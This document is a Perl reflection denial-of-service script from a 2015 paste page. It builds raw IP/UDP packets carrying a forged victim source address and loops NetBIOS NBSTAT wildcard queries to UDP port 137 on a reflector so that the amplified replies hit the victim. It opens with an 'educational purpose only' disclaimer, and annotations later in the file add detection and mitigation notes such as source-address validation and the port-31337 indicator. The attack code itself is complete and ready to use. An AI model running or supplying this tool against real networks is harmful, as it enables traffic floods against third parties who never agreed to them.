hackerscommunity

NetBios NBSTAT name query reflection dos v2

Jul 17th, 2015
  1. #!/usr/bin/perl
  2. #
  3. #  NetBios NBSTAT name query reflection dos
  4. #
  5. #  Copyright 2015 (c) Todor Donev
  6. #  todor.donev@gmail.com
  7. #  http://www.ethical-hacker.org/
  8. #  https://www.facebook.com/ethicalhackerorg
  9. #
  10. #  Disclaimer:
  11. #  This or previous program is for Educational
  12. #  purpose ONLY. Do not use it without permission.
  13. #  The usual disclaimer applies, especially the
  14. #  fact that Todor Donev is not liable for any
  15. #  damages caused by direct or indirect use of the
  16. #  information or functionality provided by these
  17. #  programs. The author or any Internet provider
  18. #  bears NO responsibility for content or misuse
  19. #  of these programs or any derivatives thereof.
  20. #  By using these programs you accept the fact
  21. #  that any damage (dataloss, system crash,
  22. #  system compromise, etc.) caused by the use
  23. #  of these programs is not Todor Donev's
  24. #  responsibility.
  25. #
  26. #  Use at your own risk and educational
  27. #  purpose ONLY!
  28. #
  29. #  See also, UDP-based Amplification Attacks:
  30. #  https://www.us-cert.gov/ncas/alerts/TA14-017A
  31. #  http://www.rhyshaden.com/netbios.htm
  32. #
  33.  
  34. use strict;
  35. use Socket;
  36. use warnings;
  37. no warnings 'uninitialized';
  38.  
  # Privilege gate: $< is the real UID. The raw socket created below is only
  # available to root, so any other user gets a message and a clean exit.
  if ( $< != 0 ) {
     print "Sorry, must be run as root!\n";
     print "This script use RAW Socket.\n";
     exit;
  }

  # Element [4] of gethostbyname()'s list return is the first packed IPv4 address.
  # $nbns is the host the queries are sent to (the reflector). $victim is only
  # ever written into the IP *source* field by iphdr(), so any answers go to that
  # address rather than back to the sender.
  # Defensive relevance: this relies on the sending network forwarding packets
  # that carry a forged source address; source-address validation at the network
  # edge (BCP 38 / uRPF) stops that.
  my $nbns            = (gethostbyname($ARGV[0]))[4];         # IP Address Destination        (32 bits)
  my $victim          = (gethostbyname($ARGV[1]))[4];         # IP Address Source             (32 bits)

  print "[ NetBios NBSTAT name query reflection ddos\n";
  # Missing or unresolvable arguments leave the variables undefined: print usage and stop.
  if (!defined $nbns || !defined $victim) {
      print "[ Usg: $0 <nbns src> <victim>\n";
      print "[ <todor.donev\@gmail.com> Todor Donev\n";
      exit;
  }
  print "[ Sending NBNS packets: $ARGV[0] -> $ARGV[1]\n";
  # Bareword handle RAW is a package global shared with send_packet().
  # Protocol number 255 is passed literally (presumably IPPROTO_RAW; confirm on the target OS).
  socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
  # NOTE(review): level 0 / option 1 are hard-coded integers whose meaning is
  # platform-specific; presumably meant to request a caller-supplied IP header.
  # Confirm against the system's socket headers.
  setsockopt(RAW, 0, 1, 1) or die $!;
  # Does not return: send_packet() loops until send() fails.
  main();
  58.  
  # Main program.
  # Builds one datagram (IP header, UDP header, NBNS payload) once and hands the
  # same bytes to send_packet(), which transmits them repeatedly. Every packet
  # is therefore byte-identical on the wire as built here, which makes the
  # traffic easy to match with a static signature.
  sub main {
      my $packet;

      $packet = iphdr();
      $packet .= udphdr();
      $packet .= nbnshdr();
      # b000000m...
      send_packet($packet);
  }
  69.  
  # IP header (Layer 3).
  # Returns the packed 20-byte IPv4 header. Reads the file-level $victim and
  # $nbns: the last two 'a4' fields are, in IPv4 header order, source then
  # destination, so $victim is the source and $nbns the destination.
  # NOTE(review): the trailing comments give the intended field values. The bytes
  # actually emitted depend on the pack template and on what the OS fills in for
  # raw sockets, so build detection signatures from a lab capture rather than
  # from these comments.
  sub iphdr {
      my $ip_ver          = 4;                    # IP Version 4          (4 bits)
      my $iphdr_len       = 5;                    # IP Header Length      (4 bits)
      my $ip_tos          = 0;                    # Differentiated Services   (8 bits)
      my $ip_total_len    = $iphdr_len + 20;          # IP Header Length + Data   (16 bits)
      my $ip_frag_id      = 0;                    # Identification Field      (16 bits)
      my $ip_frag_flag    = 000;                  # IP Frag Flags (R DF MF)   (3 bits)
      my $ip_frag_offset  = 0000000000000;            # IP Fragment Offset        (13 bits)
      my $ip_ttl          = 255;                  # IP TTL            (8 bits)
      my $ip_proto        = 17;                   # IP Protocol (17 = UDP)    (8 bits)
      my $ip_checksum     = 0;                    # IP Checksum, left zero here   (16 bits)

      # IP Packet
      my $iphdr   = pack(
              'H2 H2 n n B16 h2 c n a4 a4',
              $ip_ver . $iphdr_len, $ip_tos,
              $ip_total_len, $ip_frag_id,
              $ip_frag_flag . $ip_frag_offset,
              $ip_ttl, $ip_proto, $ip_checksum,
              $victim, $nbns              # source = $victim (forged), destination = $nbns
              );
              return $iphdr;
  }
  94.  
  # UDP Header (Layer 4).
  # Returns the packed 8-byte UDP header for the NBNS payload. Calls nbnshdr()
  # only to measure the payload length.
  # Detection note: the source port is a fixed constant, so a reflector's answer
  # would be expected to arrive at the spoofed address as UDP from port 137 to
  # port 31337. Unsolicited traffic of that shape is a usable indicator.
  sub udphdr {
      my $udp_src_port    = 31337;            # UDP Source Port   (16 bits) (0-65535)
      my $udp_dst_port    = 137;              # UDP Dest Port     (16 bits) (0-65535), NetBIOS Name Service
      my $udp_len     = 8 + length(nbnshdr());    # UDP Length        (16 bits) (0-65535), header + payload
      my $udp_checksum    = 0;                # UDP Checksum      (16 bits), zero = not computed

      # UDP Packet
      my $udphdr      = pack(
              'n n n n',
              $udp_src_port,
              $udp_dst_port,
              $udp_len,
              $udp_checksum
              );
      return $udphdr;
  }
  112.  
  # NetBios Name Service.
  # Returns the packed NBNS payload: a 12-byte header (six 16-bit words), one
  # 34-byte encoded question name, then question type and class.
  # The question is a node-status (NBSTAT) request for the wildcard name, the
  # same query that name-table lookup tools send. A host that answers returns
  # its name table, which is larger than the request (see the US-CERT alert
  # linked in the file header).
  # Mitigation: do not expose UDP/137 to untrusted networks, and disable NetBIOS
  # over TCP/IP where it is not needed.
  sub nbnshdr {

      my $transid      = 0x03e8;    # transaction ID, constant for every packet
      my $namequery    = 0x0010;    # header flags/opcode word
      my $questions    = 0x0001;    # one question follows
      my $answerrr     = 0x0000;    # no answer records
      my $authrr       = 0x0000;    # no authority records
      my $adrr         = 0x0000;    # no additional records

      # Length byte 0x20 (32), then "CK" followed by thirty "A" characters and a
      # terminating zero byte: the first-level encoding of "*" padded with NULs.
      my $query        = "\x20\x43\x4b\x41\x41\x41\x41\x41\x41\x41\x41";
         $query       .= "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
         $query       .= "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00";

      my $type        = 0x0021;    # question type NBSTAT (node status)
      my $class       = 0x0001;    # question class IN

      # NetBios packet
      my $nbnshdr     = pack(
                          'n n n n n n a* n n',
               $transid,
                           $namequery,
               $questions,
               $answerrr,
                           $authrr,
                           $adrr,
                           $query,
                           $type,
                           $class
              );
  return $nbnshdr;
  }
  145.  
  # Transmits the prebuilt datagram in $_[0] over the global RAW handle in an
  # endless loop, pausing 0.30 s between sends. Returns only by dying when
  # send() fails. The destination sockaddr is packed by hand (family AF_INET,
  # port field 60, address $nbns). With the fixed pause a single instance emits
  # roughly three identical packets per second, so per-source rate limiting on
  # UDP/137 and a static payload match are both workable controls.
  sub send_packet {
      while(1){
      select(undef, undef, undef, 0.30);          # Sleep 300 milliseconds
      send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $nbns)) or die $!;
     }
  }